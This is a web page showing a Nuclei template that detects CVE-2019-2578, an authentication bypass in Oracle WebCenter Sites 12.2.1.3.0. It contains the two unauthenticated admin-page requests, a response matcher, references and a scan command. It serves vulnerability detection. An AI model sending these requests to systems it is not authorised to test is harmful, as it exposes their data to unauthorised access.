Skip to content

Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control

ID: CVE-2019-2578

Severity: high

Author: leovalcante

Tags: cve,cve2019,oracle,wcs,auth-bypass

Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.

id: CVE-2019-2578
info:
name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control
author: leovalcante
severity: high
description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
impact: |
Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions.
remediation: |
Apply the necessary patches or updates provided by Oracle to fix the Broken Access Control vulnerability (CVE-2019-2578).
reference:
- https://www.oracle.com/security-alerts/cpuapr2019.html
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2019-2578
- http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2019-2578
epss-score: 0.00623
epss-percentile: 0.78436
cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: oracle
product: webcenter_sites
tags: cve,cve2019,oracle,wcs,auth-bypass
http:
- raw:
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
Host: {{Hostname}}
- |
GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: regex
part: body
regex:
- '<script[\d\D]*<throwexception/>'
# digest: 4a0a0047304502201e1e3318101742174d08c1ee042aa8acb9438a055feaa45cc1dacc82b8715ae70221009f7119ae7f71e5a5a16260796962736c3029853d89fa045fb00244e016f71fe8:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-2578.yaml"

View on Github